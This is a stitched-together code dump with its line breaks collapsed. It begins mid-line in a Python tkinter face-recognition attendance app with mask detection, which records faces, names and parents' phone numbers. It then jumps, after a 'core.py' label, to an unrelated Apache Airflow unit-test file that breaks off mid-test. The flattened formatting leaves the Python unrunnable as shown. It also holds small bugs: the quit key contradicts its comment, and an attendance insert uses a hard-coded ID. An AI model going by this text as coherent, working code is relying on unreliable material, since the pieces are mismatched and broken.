"--confidence", type=float, default=0.5, help="minimum probability to filter weak detections") args = vars(ap.parse_args()) # load our serialized face detector model from disk print("[INFO] loading face detector model...") prototxtPath = os.path.sep.join([args["face"], "deploy.prototxt"]) weightsPath = os.path.sep.join([args["face"], "res10_300x300_ssd_iter_140000.caffemodel"]) faceNet = cv2.dnn.readNet(prototxtPath, weightsPath) # load the face mask detector model from disk print("[INFO] loading face mask detector model...") maskNet = load_model(args["model"]) # initialize the video stream and allow the camera sensor to warm up print("[INFO] starting video stream...") vs = VideoStream(src=0).start() time.sleep(2.0) # loop over the frames from the video stream while True: # grab the frame from the threaded video stream and resize it # to have a maximum width of 400 pixels frame = vs.read() frame = imutils.resize(frame, width=400) # detect faces in the frame and determine if they are wearing a # face mask or not (locs, preds) = detect_and_predict_mask(frame, faceNet, maskNet) # loop over the detected face locations and their corresponding # locations for (box, pred) in zip(locs, preds): # unpack the bounding box and predictions (startX, startY, endX, endY) = box (mask, withoutMask) = pred # determine the class label and color we'll use to draw # the bounding box and text label = "Mask" if mask > withoutMask else "No Mask" color = (0, 255, 0) if label == "Mask" else (0, 0, 255) # include the probability in the label label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # display the label and bounding box rectangle on the output # frame cv2.putText(frame, label, (startX, startY - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2) cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2) # show the output frame cv2.imshow("Frame", frame) key = cv2.waitKey(1) & 0xFF # if the `q` key was pressed, break from the loop if key == ord("w"): break # do a bit of cleanup cv2.destroyAllWindows() vs.stop() def clear(): txt1.delete(0, 'end') res = "" message.configure(text=res) def clear2(): txt2.delete(0, 'end') res = "" message.configure(text=res) def clear3(): txt3.delete(0, 'end') res = "" message.configure(text=res) 
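# Illustrative sketch, not part of the original application: the per-face
# preprocessing performed inside detect_and_predict_mask() above, isolated so
# the 224x224 MobileNetV2 input contract is explicit. `maskNet` is assumed to
# be the Keras model loaded via load_model() above; `frame` and `box` are
# placeholders for one video frame and one detected face box.
def _mask_probability_sketch(frame, box, maskNet):
    (startX, startY, endX, endY) = box
    face = frame[startY:endY, startX:endX]            # crop the detected face
    face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)      # OpenCV BGR -> RGB
    face = cv2.resize(face, (224, 224))               # MobileNetV2 input size
    face = preprocess_input(img_to_array(face))       # scale pixels to [-1, 1]
    face = np.expand_dims(face, axis=0)               # add the batch dimension
    (mask, withoutMask) = maskNet.predict(face)[0]
    return mask > withoutMask                         # True when a mask is likely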
def is_number(s): try: float(s) return True except ValueError: pass try: import unicodedata unicodedata.numeric(s) return True except (TypeError, ValueError): pass return False def TakeImages(): Id = (txt1.get()) name = (txt2.get()) phone_number = (txt3.get()) if is_number(Id) and name.isalpha() and is_number(phone_number): cam = cv2.VideoCapture(0) harcascadePath = "haarcascade_frontalface_default.xml" detector = cv2.CascadeClassifier(harcascadePath) sampleNum = 0 while (True): ret, img = cam.read() gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) faces = detector.detectMultiScale(gray, 1.3, 5) for (x, y, w, h) in faces: cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2) # incrementing sample number sampleNum = sampleNum + 1 # saving the captured face in the dataset folder TrainingImage cv2.imwrite("TrainingImage\ " + name + "." + Id + '.' + str(sampleNum) + ".jpg", gray[y:y + h, x:x + w]) # display the frame cv2.imshow('frame', img) # wait for 100 miliseconds if cv2.waitKey(100) & 0xFF == ord('q'): break # break if the sample number is morethan 100 elif sampleNum > 60: break cam.release() cv2.destroyAllWindows() res = "Images Saved for ID : " + Id + " Name : " + name + " Parent's Phone Number : " + phone_number row = [Id, name, phone_number] with open('StudentDetails\StudentDetails.csv', 'a+') as csvFile: writer = csv.writer(csvFile) writer.writerow(row) csvFile.close() message.configure(text=res) sql = "Insert into tbl_people (id,firstname,emailaddress) values(%s,%s,%s)" val = (Id, name, phone_number) mycursor.execute(sql, val) sql1="insert into tbl_company_data (reference,company,department,jobposition,idno) values (%s,%s,%s,%s,%s)" val1=(Id,"Institute of Engineering & Management","Bca","Student",Id) mycursor.execute(sql1,val1) mydb.commit() else: # print(is_number(Id)) # print(name.isalpha()) # print(is_number(phone_number)) if (is_number(Id) and name.isalpha()): res="Enter Phone Number" message.configure(text=res) elif is_number(Id) and is_number(phone_number): res="Enter Alphabetical Name" message.configure(text=res) elif (name.isalpha() and is_number(phone_number)): res="Enter Numeric Id" message.configure(text=res) elif is_number(Id): res="Enter Phone Number \n Enter Alphabetical Name" message.configure(text=res) elif name.isalpha(): res="Enter Numeric Id \n Enter Phone Number" message.configure(text=res) elif is_number(phone_number): res="Enter Alphabetical Name \n Enter Numeric Id" message.configure(text=res) def TrainImages(): recognizer = cv2.face.LBPHFaceRecognizer_create() # recognizer = cv2.face.LBPHFaceRecognizer_create()#$cv2.createLBPHFaceRecognizer() harcascadePath = "haarcascade_frontalface_default.xml" detector = cv2.CascadeClassifier(harcascadePath) faces, Id = getImagesAndLabels("TrainingImage") recognizer.train(faces, np.array(Id)) recognizer.save("TrainingImageLabel\Trainner.yml") res = "Image Trained" # +",".join(str(f) for f in Id) message.configure(text=res) def getImagesAndLabels(path): # get the path of all the files in the folder imagePaths = [os.path.join(path, f) for f in os.listdir(path)] # print(imagePaths) # create empth face list faces = [] # create empty ID list Ids = [] # now looping through all the image paths and loading the Ids and the images for imagePath in imagePaths: # loading the image and converting it to gray scale pilImage = Image.open(imagePath).convert('L') # Now we are converting the PIL image into numpy array imageNp = np.array(pilImage, 'uint8') # getting the Id from the image Id = int(os.path.split(imagePath)[-1].split(".")[1]) # 
extract the face from the training image sample faces.append(imageNp) Ids.append(Id) return faces, Ids def TrackImages(): recognizer = cv2.face.LBPHFaceRecognizer_create() # cv2.createLBPHFaceRecognizer() recognizer.read("TrainingImageLabel\Trainner.yml") harcascadePath = "haarcascade_frontalface_default.xml" faceCascade = cv2.CascadeClassifier(harcascadePath); df = pd.read_csv("StudentDetails\StudentDetails.csv") cam = cv2.VideoCapture(0) font = cv2.FONT_HERSHEY_SIMPLEX col_names = ['Id', 'Name', 'Date', 'Time','Phone Number'] attendance = pd.DataFrame(columns=col_names) while True: ret, im = cam.read() gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY) faces = faceCascade.detectMultiScale(gray, 1.2, 5) for (x, y, w, h) in faces: cv2.rectangle(im, (x, y), (x + w, y + h), (225, 0, 0), 2) Id, conf = recognizer.predict(gray[y:y + h, x:x + w]) print(conf) if (conf < 50): ts = time.time() date = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d') timeStamp = datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S') aa = df.loc[df['Id'] == Id]['Name'].values pp = df.loc[df['Id'] == Id]['Phone Number'].values tt = str(Id) + "-" + aa attendance.loc[len(attendance)] = [Id, aa, date, timeStamp,pp] else: Id = 'Unknown' tt = str(Id) if (conf > 75): noOfFile = len(os.listdir("ImagesUnknown")) + 1 cv2.imwrite("ImagesUnknown\Image" + str(noOfFile) + ".jpg", im[y:y + h, x:x + w]) cv2.putText(im, str(tt), (x, y + h), font, 1, (255, 255, 255), 2) attendance = attendance.drop_duplicates(subset=['Id'], keep='first') cv2.imshow('im', im) if (cv2.waitKey(1) == ord('q')): break ts = time.time() date = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d') timeStamp = datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S') Hour, Minute, Second = timeStamp.split(":") print("My name is ", aa[0]) print("My id is", Id) print("my phone is ",pp[0]) number = str(pp[0]) print(type(number)) print(type(aa[0])) print(type(Id)) # try: # t = Thread(target=whatsapp(number,Hour,Minute)) # t.deamon=true # t.start() # except: # print("Unable to send text") #kit.sendwhatmsg("+91"+number, "Hey your attendances has been recorded" , int(Hour) , int(Minute)+2) # sql = "INSERT INTO testyash (idno,employee) VALUES (%s,&s)" #val = ("100", "Yash Kanoria") # mycursor.execute(sql, val) # # mydb.commit() # # url = "https://attendify-api.herokuapp.com/" # response = requests.get(url) print("both", aa[0], Id) sql = "Insert into tbl_people_attendance(idno,date,employee,timein) values (%s,%s,%s,%s)" val=(10,date,aa[0],timeStamp) mycursor.execute(sql,val) mydb.commit() # payload = "{\r\n \"rollNo\": \"1\",\r\n \"name\": \"Yash Kanoria\"\r\n}" # PARAMS = {'rollNo': '12345' ,'name': 'test23456'} # headers = { # 'Content-Type': 'application/json' # } # PARAMS = {'rollNo': Id, 'name': aa[0]} # print(PARAMS) # response = requests.post(url, data=json.dumps(PARAMS), headers=headers) # print(response.text.encode('utf8')) fileName = "Attendance\Attendance_" + date + ".csv" # fileName="Attendance\Attendance_"+date+"_"+Hour+"-"+Minute+"-"+Second+".csv" # print("1 record inserted, ID:", mycursor.lastrowid) attendance.to_csv(fileName, mode='a', index=False) #attendance.to_csv(fileName, mode='a', index=False) cam.release() cv2.destroyAllWindows() print(attendance) res = attendance message2.configure(text=res) loadimageclear1 = tk.PhotoImage(file="Images\\Clear.png") roundedbuttonclear1 = tk.Button(root, image=loadimageclear1, command=clear) roundedbuttonclear1["bg"] = "white" roundedbuttonclear1["border"] = "0" roundedbuttonclear1.place(x=670, y=285) 
roundedbuttonclear2 = tk.Button(root, image=loadimageclear1, command=clear2) roundedbuttonclear2["bg"] = "white" roundedbuttonclear2["border"] = "0" roundedbuttonclear2.place(x=670, y=365) roundedbuttonclear3 = tk.Button(root, image=loadimageclear1, command=clear3) roundedbuttonclear3["bg"] = "white" roundedbuttonclear3["border"] = "0" roundedbuttonclear3.place(x=670, y=445) notification = tk.Label(root, text="Notification : ", width=12, height=1, fg="black", bg="white", font=('times', 15, ' bold ')) notification.place(x=390, y=490) message = tk.Label(root, text=" ", width=30, height=2, fg="black", font=('times', 15, ' bold ')) message.place(x=540, y=490) take = tk.PhotoImage(file="Images\\Take_Images.png") take_images = tk.Button(root, image=take, command=TakeImages) take_images["bg"] = "white" take_images["border"] = "0" take_images.place(x=380, y=550) training = tk.PhotoImage(file="Images\\Train_Images.png") train_images = tk.Button(root, image=training, command=TrainImages) train_images["bg"] = "white" train_images["border"] = "0" train_images.place(x=530, y=550) track = tk.PhotoImage(file="Images\\Take_Attendence.png") track_images = tk.Button(root, image=track, command=TrackImages) track_images["bg"] = "white" track_images["border"] = "0" track_images.place(x=680, y=550) q = tk.PhotoImage(file="Images\\Quit.png") qt = tk.Button(root, image=q, command=root.destroy) qt["bg"] = "white" qt["border"] = "0" qt.place(x=830, y=550) q1 = tk.PhotoImage(file="Images\\Detect_Mask.png") qt1 = tk.Button(root, image=q1, command=maskdetor) qt1["bg"] = "white" qt1["border"] = "0" qt1.place(x=130, y=320) root.mainloop()
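# Illustrative sketch, not part of the original application: the LBPH
# train/recognize cycle that TrainImages() and TrackImages() above are built
# around, reduced to its essentials. The conf < 50 acceptance threshold mirrors
# TrackImages(); the image arrays and labels are placeholders supplied by the
# caller.
def _lbph_cycle_sketch(face_images, labels, probe_face):
    # face_images: list of same-sized grayscale numpy arrays (uint8)
    # labels:      one integer person id per training image
    # probe_face:  a grayscale numpy array to identify
    recognizer = cv2.face.LBPHFaceRecognizer_create()
    recognizer.train(face_images, np.array(labels))
    person_id, conf = recognizer.predict(probe_face)
    # LBPH confidence is a distance: lower means a closer match.
    return person_id if conf < 50 else None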
core.py
# -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import print_function import json import unittest import bleach import doctest import mock import multiprocessing import os import re import signal import sqlalchemy import subprocess import tempfile import warnings from datetime import timedelta from dateutil.relativedelta import relativedelta from email.mime.application import MIMEApplication from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from numpy.testing import assert_array_almost_equal from six.moves.urllib.parse import urlencode from time import sleep from airflow import configuration from airflow.executors import SequentialExecutor from airflow.models import Variable from airflow import jobs, models, DAG, utils, macros, settings, exceptions from airflow.models import BaseOperator from airflow.operators.bash_operator import BashOperator from airflow.operators.check_operator import CheckOperator, ValueCheckOperator from airflow.operators.dagrun_operator import TriggerDagRunOperator from airflow.operators.python_operator import PythonOperator from airflow.operators.dummy_operator import DummyOperator from airflow.hooks.base_hook import BaseHook from airflow.hooks.sqlite_hook import SqliteHook from airflow.bin import cli from airflow.www import app as application from airflow.settings import Session from airflow.utils import timezone from airflow.utils.timezone import datetime from airflow.utils.state import State from airflow.utils.dates import infer_time_unit, round_time, scale_time_units from lxml import html from airflow.exceptions import AirflowException from airflow.configuration import AirflowConfigException, run_command from jinja2.sandbox import SecurityError from jinja2 import UndefinedError from pendulum import utcnow import six NUM_EXAMPLE_DAGS = 18 DEV_NULL = '/dev/null' TEST_DAG_FOLDER = os.path.join( os.path.dirname(os.path.realpath(__file__)), 'dags') DEFAULT_DATE = datetime(2015, 1, 1) DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat() DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10] TEST_DAG_ID = 'unit_tests' try: import cPickle as pickle except ImportError: # Python 3 import pickle def reset(dag_id=TEST_DAG_ID): session = Session() tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id) tis.delete() session.commit() session.close() configuration.conf.load_test_config() if os.environ.get('KUBERNETES_VERSION') is None: reset() class OperatorSubclass(BaseOperator): """ An operator to test template substitution """ template_fields = ['some_templated_field'] def __init__(self, some_templated_field, *args, **kwargs): super(OperatorSubclass, self).__init__(*args, **kwargs) self.some_templated_field = some_templated_field def execute(*args, **kwargs): pass class 
CoreTest(unittest.TestCase): default_scheduler_args = {"num_runs": 1} def setUp(self): configuration.conf.load_test_config() self.dagbag = models.DagBag( dag_folder=DEV_NULL, include_examples=True) self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE} self.dag = DAG(TEST_DAG_ID, default_args=self.args) self.dag_bash = self.dagbag.dags['example_bash_operator'] self.runme_0 = self.dag_bash.get_task('runme_0') self.run_after_loop = self.dag_bash.get_task('run_after_loop') self.run_this_last = self.dag_bash.get_task('run_this_last') def test_schedule_dag_no_previous_runs(self): """ Tests scheduling a dag with no previous runs """ dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs') dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertEqual(dag.dag_id, dag_run.dag_id) self.assertIsNotNone(dag_run.run_id) self.assertNotEqual('', dag_run.run_id) self.assertEqual( datetime(2015, 1, 2, 0, 0), dag_run.execution_date, msg='dag_run.execution_date did not match expectation: {0}' .format(dag_run.execution_date) ) self.assertEqual(State.RUNNING, dag_run.state) self.assertFalse(dag_run.external_trigger) dag.clear() def test_schedule_dag_relativedelta(self): """ Tests scheduling a dag with a relativedelta schedule_interval """ delta = relativedelta(hours=+1) dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta', schedule_interval=delta) dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertEqual(dag.dag_id, dag_run.dag_id) self.assertIsNotNone(dag_run.run_id) self.assertNotEqual('', dag_run.run_id) self.assertEqual( datetime(2015, 1, 2, 0, 0), dag_run.execution_date, msg='dag_run.execution_date did not match expectation: {0}' .format(dag_run.execution_date) ) self.assertEqual(State.RUNNING, dag_run.state) self.assertFalse(dag_run.external_trigger) dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run2) self.assertEqual(dag.dag_id, dag_run2.dag_id) self.assertIsNotNone(dag_run2.run_id) self.assertNotEqual('', dag_run2.run_id) self.assertEqual( datetime(2015, 1, 2, 0, 0) + delta, dag_run2.execution_date, msg='dag_run2.execution_date did not match expectation: {0}' .format(dag_run2.execution_date) ) self.assertEqual(State.RUNNING, dag_run2.state) self.assertFalse(dag_run2.external_trigger) dag.clear() def test_schedule_dag_fake_scheduled_previous(self): """ Test scheduling a dag where there is a prior DagRun which has the same run_id as the next run should have """ delta = timedelta(hours=1) dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous', schedule_interval=delta, start_date=DEFAULT_DATE) dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=DEFAULT_DATE)) scheduler = jobs.SchedulerJob(**self.default_scheduler_args) dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE), execution_date=DEFAULT_DATE, state=State.SUCCESS, external_trigger=True) dag_run = scheduler.create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertEqual(dag.dag_id, dag_run.dag_id) self.assertIsNotNone(dag_run.run_id) self.assertNotEqual('', dag_run.run_id) self.assertEqual( DEFAULT_DATE + delta, dag_run.execution_date, 
msg='dag_run.execution_date did not match expectation: {0}' .format(dag_run.execution_date) ) self.assertEqual(State.RUNNING, dag_run.state) self.assertFalse(dag_run.external_trigger) def test_schedule_dag_once(self): """ Tests scheduling a dag scheduled for @once - should be scheduled the first time it is called, and not scheduled the second. """ dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once') dag.schedule_interval = '@once' dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag) self.assertIsNotNone(dag_run) self.assertIsNone(dag_run2) dag.clear() def test_fractional_seconds(self): """ Tests if fractional seconds are stored in the database """ dag = DAG(TEST_DAG_ID + 'test_fractional_seconds') dag.schedule_interval = '@once' dag.add_task(models.BaseOperator( task_id="faketastic", owner='Also fake', start_date=datetime(2015, 1, 2, 0, 0))) start_date = timezone.utcnow() run = dag.create_dagrun( run_id='test_' + start_date.isoformat(), execution_date=start_date, start_date=start_date, state=State.RUNNING, external_trigger=False ) run.refresh_from_db() self.assertEqual(start_date, run.execution_date, "dag run execution_date loses precision") self.assertEqual(start_date, run.start_date, "dag run start_date loses precision ") def test_schedule_dag_start_end_dates(self): """ Tests that an attempt to schedule a task after the Dag's end_date does not succeed. """ delta = timedelta(hours=1) runs = 3 start_date = DEFAULT_DATE end_date = start_date + (runs - 1) * delta dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates', start_date=start_date, end_date=end_date, schedule_interval=delta) dag.add_task(models.BaseOperator(task_id='faketastic', owner='Also fake')) # Create and schedule the dag runs dag_runs = [] scheduler = jobs.SchedulerJob(**self.default_scheduler_args) for i in range(runs): dag_runs.append(scheduler.create_dag_run(dag)) additional_dag_run = scheduler.create_dag_run(dag) for dag_run in dag_runs: self.assertIsNotNone(dag_run) self.assertIsNone(additional_dag_run) def test_schedule_dag_no_end_date_up_to_today_only(self): """ Tests that a Dag created without an end_date can only be scheduled up to and including the current datetime. For example, if today is 2016-01-01 and we are scheduling from a start_date of 2015-01-01, only jobs up to, but not including 2016-01-01 should be scheduled. 
""" session = settings.Session() delta = timedelta(days=1) now = utcnow() start_date = now.subtract(weeks=1) runs = (now - start_date).days dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only', start_date=start_date, schedule_interval=delta) dag.add_task(models.BaseOperator(task_id='faketastic', owner='Also fake')) dag_runs = [] scheduler = jobs.SchedulerJob(**self.default_scheduler_args) for i in range(runs): dag_run = scheduler.create_dag_run(dag) dag_runs.append(dag_run) # Mark the DagRun as complete dag_run.state = State.SUCCESS session.merge(dag_run) session.commit() # Attempt to schedule an additional dag run (for 2016-01-01) additional_dag_run = scheduler.create_dag_run(dag) for dag_run in dag_runs: self.assertIsNotNone(dag_run) self.assertIsNone(additional_dag_run) def test_confirm_unittest_mod(self): self.assertTrue(configuration.conf.get('core', 'unit_test_mode')) def test_pickling(self): dp = self.dag.pickle() self.assertEqual(dp.pickle.dag_id, self.dag.dag_id) def test_rich_comparison_ops(self): class DAGsubclass(DAG): pass dag_eq = DAG(TEST_DAG_ID, default_args=self.args) dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args) dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args) dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args) dag_subclass_diff_name = DAGsubclass( TEST_DAG_ID + '2', default_args=self.args) for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]: d.last_loaded = self.dag.last_loaded # test identity equality self.assertEqual(self.dag, self.dag) # test dag (in)equality based on _comps self.assertEqual(dag_eq, self.dag) self.assertNotEqual(dag_diff_name, self.dag) self.assertNotEqual(dag_diff_load_time, self.dag) # test dag inequality based on type even if _comps happen to match self.assertNotEqual(dag_subclass, self.dag) # a dag should equal an unpickled version of itself d = pickle.dumps(self.dag) self.assertEqual(pickle.loads(d), self.dag) # dags are ordered based on dag_id no matter what the type is self.assertLess(self.dag, dag_diff_name) self.assertGreater(self.dag, dag_diff_load_time) self.assertLess(self.dag, dag_subclass_diff_name) # greater than should have been created automatically by functools self.assertGreater(dag_diff_name, self.dag) # hashes are non-random and match equality self.assertEqual(hash(self.dag), hash(self.dag)) self.assertEqual(hash(dag_eq), hash(self.dag)) self.assertNotEqual(hash(dag_diff_name), hash(self.dag)) self.assertNotEqual(hash(dag_subclass), hash(self.dag)) def test_check_operators(self): conn_id = "sqlite_default" captainHook = BaseHook.get_hook(conn_id=conn_id) captainHook.run("CREATE TABLE operator_test_table (a, b)") captainHook.run("insert into operator_test_table values (1,2)") t = CheckOperator( task_id='check', sql="select count(*) from operator_test_table", conn_id=conn_id, dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) t = ValueCheckOperator( task_id='value_check', pass_value=95, tolerance=0.1, conn_id=conn_id, sql="SELECT 100", dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) captainHook.run("drop table operator_test_table") def test_clear_api(self): task = self.dag_bash.tasks[0] task.clear( start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, upstream=True, downstream=True) ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE) ti.are_dependents_done() def test_illegal_args(self): """ Tests that Operators reject illegal arguments """ with 
warnings.catch_warnings(record=True) as w: BashOperator( task_id='test_illegal_args', bash_command='echo success', dag=self.dag, illegal_argument_1234='hello?') self.assertTrue( issubclass(w[0].category, PendingDeprecationWarning)) self.assertIn( 'Invalid arguments were passed to BashOperator.', w[0].message.args[0]) def test_bash_operator(self): t = BashOperator( task_id='test_bash_operator', bash_command="echo success", dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_bash_operator_multi_byte_output(self): t = BashOperator( task_id='test_multi_byte_bash_operator', bash_command=u"echo \u2600", dag=self.dag, output_encoding='utf-8') t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_bash_operator_kill(self): import psutil sleep_time = "100%d" % os.getpid() t = BashOperator( task_id='test_bash_operator_kill', execution_timeout=timedelta(seconds=1), bash_command="/bin/bash -c 'sleep %s'" % sleep_time, dag=self.dag) self.assertRaises( exceptions.AirflowTaskTimeout, t.run, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE) sleep(2) pid = -1 for proc in psutil.process_iter(): if proc.cmdline() == ['sleep', sleep_time]: pid = proc.pid if pid != -1: os.kill(pid, signal.SIGTERM) self.fail("BashOperator's subprocess still running after stopping on timeout!") def test_trigger_dagrun(self): def trigga(context, obj): if True: return obj t = TriggerDagRunOperator( task_id='test_trigger_dagrun', trigger_dag_id='example_bash_operator', python_callable=trigga, dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_dryrun(self): t = BashOperator( task_id='test_dryrun', bash_command="echo success", dag=self.dag) t.dry_run() def test_sqlite(self): import airflow.operators.sqlite_operator t = airflow.operators.sqlite_operator.SqliteOperator( task_id='time_sqlite', sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))", dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_timeout(self): t = PythonOperator( task_id='test_timeout', execution_timeout=timedelta(seconds=1), python_callable=lambda: sleep(5), dag=self.dag) self.assertRaises( exceptions.AirflowTaskTimeout, t.run, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_python_op(self): def test_py_op(templates_dict, ds, **kwargs): if not templates_dict['ds'] == ds: raise Exception("failure") t = PythonOperator( task_id='test_py_op', provide_context=True, python_callable=test_py_op, templates_dict={'ds': "{{ ds }}"}, dag=self.dag) t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_complex_template(self): def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field['bar'][1], context['ds']) t = OperatorSubclass( task_id='test_complex_template', some_templated_field={ 'foo': '123', 'bar': ['baz', '{{ ds }}'] }, dag=self.dag) t.execute = verify_templated_field t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_with_variable(self): """ Test the availability of variables in templates """ val = { 'test_value': 'a test value' } Variable.set("a_variable", val['test_value']) def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field, val['test_value']) t = OperatorSubclass( task_id='test_complex_template', some_templated_field='{{ var.value.a_variable }}', dag=self.dag) t.execute = verify_templated_field 
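        # Swapping execute() for verify_templated_field means the check runs in place
        # of the operator's own logic; t.run() below renders '{{ var.value.a_variable }}'
        # before execute() is invoked, so the verification callable should see the
        # resolved Variable value in some_templated_field.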
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_with_json_variable(self): """ Test the availability of variables (serialized as JSON) in templates """ val = { 'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}} } Variable.set("a_variable", val['test_value'], serialize_json=True) def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field, val['test_value']['obj']['v2']) t = OperatorSubclass( task_id='test_complex_template', some_templated_field='{{ var.json.a_variable.obj.v2 }}', dag=self.dag) t.execute = verify_templated_field t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_with_json_variable_as_value(self): """ Test the availability of variables (serialized as JSON) in templates, but accessed as a value """ val = { 'test_value': {'foo': 'bar'} } Variable.set("a_variable", val['test_value'], serialize_json=True) def verify_templated_field(context): self.assertEqual(context['ti'].task.some_templated_field, u'{"foo": "bar"}') t = OperatorSubclass( task_id='test_complex_template', some_templated_field='{{ var.value.a_variable }}', dag=self.dag) t.execute = verify_templated_field t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True) def test_template_non_bool(self): """ Test templates can handle objects with no sense of truthiness """ class NonBoolObject(object): def __len__(self): return NotImplemented def __bool__(self): return NotImplemented t = OperatorSubclass( task_id='test_bad_template_obj', some_templated_field=NonBoolObject(), dag=self.dag) t.resolve_template_files() def test_task_get_template(self): TI = models.TaskInstance ti = TI( task=self.runme_0, execution_date=DEFAULT_DATE) ti.dag = self.dag_bash ti.run(ignore_ti_state=True) context = ti.get_template_context() # DEFAULT DATE is 2015-01-01 self.assertEquals(context['ds'], '2015-01-01') self.assertEquals(context['ds_nodash'], '20150101') # next_ds is 2015-01-02 as the dag interval is daily self.assertEquals(context['next_ds'], '2015-01-02') self.assertEquals(context['next_ds_nodash'], '20150102') # prev_ds is 2014-12-31 as the dag interval is daily self.assertEquals(context['prev_ds'], '2014-12-31') self.assertEquals(context['prev_ds_nodash'], '20141231') self.assertEquals(context['ts'], '2015-01-01T00:00:00+00:00') self.assertEquals(context['ts_nodash'], '20150101T000000+0000') self.assertEquals(context['yesterday_ds'], '2014-12-31') self.assertEquals(context['yesterday_ds_nodash'], '20141231') self.assertEquals(context['tomorrow_ds'], '2015-01-02') self.assertEquals(context['tomorrow_ds_nodash'], '20150102') def test_import_examples(self): self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS) def test_local_task_job(self): TI = models.TaskInstance ti = TI( task=self.runme_0, execution_date=DEFAULT_DATE) job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True) job.run() def test_raw_job(self): TI = models.TaskInstance ti = TI( task=self.runme_0, execution_date=DEFAULT_DATE) ti.dag = self.dag_bash ti.run(ignore_ti_state=True) def test_doctests(self): modules = [utils, macros] for mod in modules: failed, tests = doctest.testmod(mod) if failed: raise Exception("Failed a doctest") def test_variable_set_get_round_trip(self): Variable.set("tested_var_set_id", "Monday morning breakfast") self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id")) def test_variable_set_get_round_trip_json(self): value = {"a": 17, "b": 47} 
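        # The dict is stored as JSON (serialize_json=True) and must come back as an
        # equal dict when read with deserialize_json=True.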
